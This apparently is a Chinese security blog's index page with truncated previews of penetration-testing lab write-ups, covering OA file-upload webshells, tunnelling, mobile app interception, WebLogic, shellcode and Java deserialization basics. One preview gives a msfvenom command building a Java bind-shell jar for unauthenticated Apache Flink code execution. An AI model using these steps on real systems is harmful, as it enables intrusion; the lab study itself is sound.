网站地址：https://ai.manic.com.cn/ 这篇指导文档默认你使用代理 （使用代理是为了下载安装软件，当环境搭建完成使用时不需要代理） Hermes Agentkali上安装Hermes Agent 1、安装前配置代理 vim ~/.zshrc 123export http_proxy=http://物理机wifi地址:VPN局域网端口export https_proxy=htt

靶场环境来自：棉花糖——靶机-No-CVE-Range系列靶场B 大概拓扑如下： 1、端口扫描与服务探测通达OA任意文件上传，传了一个马，用蚁剑连接 发现有个192.168.10.0/24段的，搭个代理访问 先搭建个隧道，本来想用Stowawa的，没成功 用了一个http协议的工具suo5（后面把suo5代理换成了reGeorg，可以看”在搭建代理链过程中遇到问题”） 因为网站是php

站在巨人Frida肩膀上的Brida文章内容来自于大佬的分享-App渗透:BurpSuite插件-Brida apk逆向自动加解密Custom plugins演示_哔哩哔哩_bilibili 跟着佬复现的一枚小学生，记录下来给自己看的 环境搭建安装brida插件https://github.com/federicodotta/Brida pip版本 github下载scrcpy工具（顺便给手机打

靶场环境大概是这样的 外网主机上线注册一个用户，登录后台后，找到个人资料功能点，有一个上传文件的功能点，F12找到路径（https://blog.csdn.net/qq_42321190/article/details/139424041参考的这个） 访问路径，进行上传文件操作 数据包内容为大马 https://github.com/tennc/webshell/blob/master/www-

使用proxypin工具 https://github.com/wanghongenpin/proxypin 安装到手机上以后的操作首页有一个应用白名单 默认不开启，点一下开启，添加软件，只抓某一个的数据包 我的->HTTPS代理->启用HTTPS代理 点击安装根证书，将证书通过MT管理器传入到/data/adb/modules/Mo

apache-flink-unauth-rce-不出网上线msf直接未授权访问 使用msf生成jar包 msfvenom -p java/shell/bind_tcp RHOST=对方IP LPORT=4654 -f jar >hello.jar 将jar包上传到Submit New Job功能点 msf配置好监听 点击submit，我点了三

手动搭建的weblogic漏洞环境，参考文章：https://blog.csdn.net/qq_41617034/article/details/118799208 一开始使用Ubuntu的NAT环境，但是没有成功，最后按照网上的说法应该是NAT模式不大行，然后使用的是桥接模式了 Ubuntu-IP：172.16.1.168 物理机-IP（攻击机）：172.16.1.129 使用到的工具1.exp

报错 1231.docker: Error response from daemon: Get "https://registry-1.docker.io/v2/": net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).2

Shellcode1、shellcode是什么shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后，塞入一段可让CPU执行的shellcode机器码，让电脑可以执行攻击者的任意指令。 说白了，就是一段16进制字符串，可以直接运行在内存中 2、shellcod

Java反序列化介绍：序列化（Serialization）：把Java对象转换为字节序列的过程。反序列化（DeSerialization）：把字节序列恢复为Java对象的过程。 其中有两个重要的方法：writeObject和readObject。序列化时需要使用writeObject将对象转化为字节流，反序列化需要使用readObject将字节流转化为对象。 反序列化基础操作打开idea，创建项目